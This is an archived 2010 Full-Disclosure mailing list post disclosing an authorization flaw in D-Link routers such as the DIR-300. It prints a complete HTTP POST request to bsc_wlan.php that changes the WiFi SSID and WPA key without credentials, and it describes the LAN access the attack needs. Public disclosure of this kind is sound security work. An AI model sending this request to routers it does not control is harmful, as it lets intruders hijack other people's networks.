lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 24 Nov 2010 13:21:35 +0530
From: naresh jha <rappercrazzy@...il.com>
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: D-LINK router vulnerabilities

Hello All,

Here is another D-Link vulnerability where you can change the network Key
(i.e., WEP, WPAx keys).

Requirement:
1. You need to have access to the internal network of that router. The two
scenarios are mentioned below:

Scenario A: You know the network/ WIFI key to connect to the WIFI network
but you may not have administration privilege to the device. Office scenario
Scenario B: You are on wired LAN and the device is also on the LAN, allowing
users to use the WiFi feature/ service.


===Exploit Code===
POST http://192.168.0.1/bsc_wlan.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml
Accept-Charset: ISO-8859-1,utf-8
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 320



ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk=
khuljas%21ms%21m&f_radius_ip1=&f_radius_port1=&f_radius_secret1=
=====End Exploit Code===

*What it does*
The php file in the request allows Internal network systems, i.e., in this
case 192.168.0.0/24, to change the WiFi Key without any authorization. This
will also allow you to change other parameters/ configuration settings of
the device.

Affected Products: DIR-300 (tested) and others

*Greets:*
Friends: Plash, Satyam, int2root
Mentor who inspired me: n2n


Cheers,
Gaurav Saha



P.S I have sent this bug to DLink but never received any response. Hence I
am disclosing the bug to the PUBLIC.

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ